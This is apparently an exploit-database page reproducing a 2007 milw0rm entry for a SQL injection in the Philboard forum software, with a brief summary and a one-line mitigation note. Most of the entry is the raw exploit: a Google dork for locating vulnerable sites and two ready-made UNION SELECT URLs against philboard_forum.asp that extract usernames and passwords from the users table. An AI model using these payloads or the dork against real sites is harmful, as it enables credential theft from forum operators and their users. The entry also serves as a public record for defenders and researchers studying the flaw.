header-logo
Suggest Exploit
vendor:
Philboard
by:
xoron
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Philboard
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Philboard (id) Remote SQL Injection

The vulnerability exists in the 'philboard_forum.asp' file, where an attacker can inject SQL queries through the 'forumid' parameter. By manipulating the SQL query, an attacker can retrieve sensitive information such as usernames and passwords from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before using it in SQL queries or use prepared statements.
Source

Exploit-DB raw data:

----------------------------------------------------

Philboard (id) Remote SQL Injection

----------------------------------------------------

Bulan: xoron

xoron.info - xoron.biz

Google Dork : "Powered by Philboard" , "inurl:philboard_forum.asp"

----------------------------------------------------

Exploit: philboard_forum.asp?forumid=[SQL]

----------------------------------------------------

Example:

Username
philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users

Password
philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users

----------------------------------------------------

Forum: username + password

----------------------------------------------------

Download: open http://www.aspindir.com/indir.asp?id=3538 and click "Ýndirmek için týklayýn" .

----------------------------------------------------

# milw0rm.com [2007-02-12]

Navigation

Suggest Exploit

Services By CQR